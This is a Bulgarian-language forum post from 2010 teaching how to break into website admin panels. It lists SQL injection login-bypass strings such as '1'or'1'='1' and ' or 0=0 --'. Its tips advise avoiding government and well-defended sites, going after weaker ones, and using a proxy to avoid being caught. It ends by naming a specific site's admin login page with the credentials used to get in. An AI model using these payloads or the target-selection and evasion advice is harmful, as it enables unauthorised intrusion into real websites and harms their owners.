fFinGer Admin
Posts : 50 Join date : 03.03.2010
| Заглавие: Как да хакнем админ панела на някой сайт. Пет Мар 05, 2010 4:30 pm | |
| Сега ще се научим как да хакнем админ панела на някой сайт. Лист с инжекции: admin'-- 1'or'1'='1 ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a Как работи?: SQL инжекцията вкарва код в mysql датабазата ,който преминава през security логина. Съвети:
- Не го пробвайте на .gov или .edu сайтове.
- Не го пробвайте на сайтове, които изглеждат наистина сложни (data.bg,vbox7.com и т.н.)
- Пробвайте го на сайтове, които записват фалшиви регистрации
- Бъдете сигурни, че не пише powered by и след това име на някоя компания
- Използвайте proxy, ако мислите, че ще ви хванат
Използваният сайт е: http://www.hockeyrecruit.com/admin/login.aspАкаунт: admin Парола: 1'or'1'='1 Video: | |
|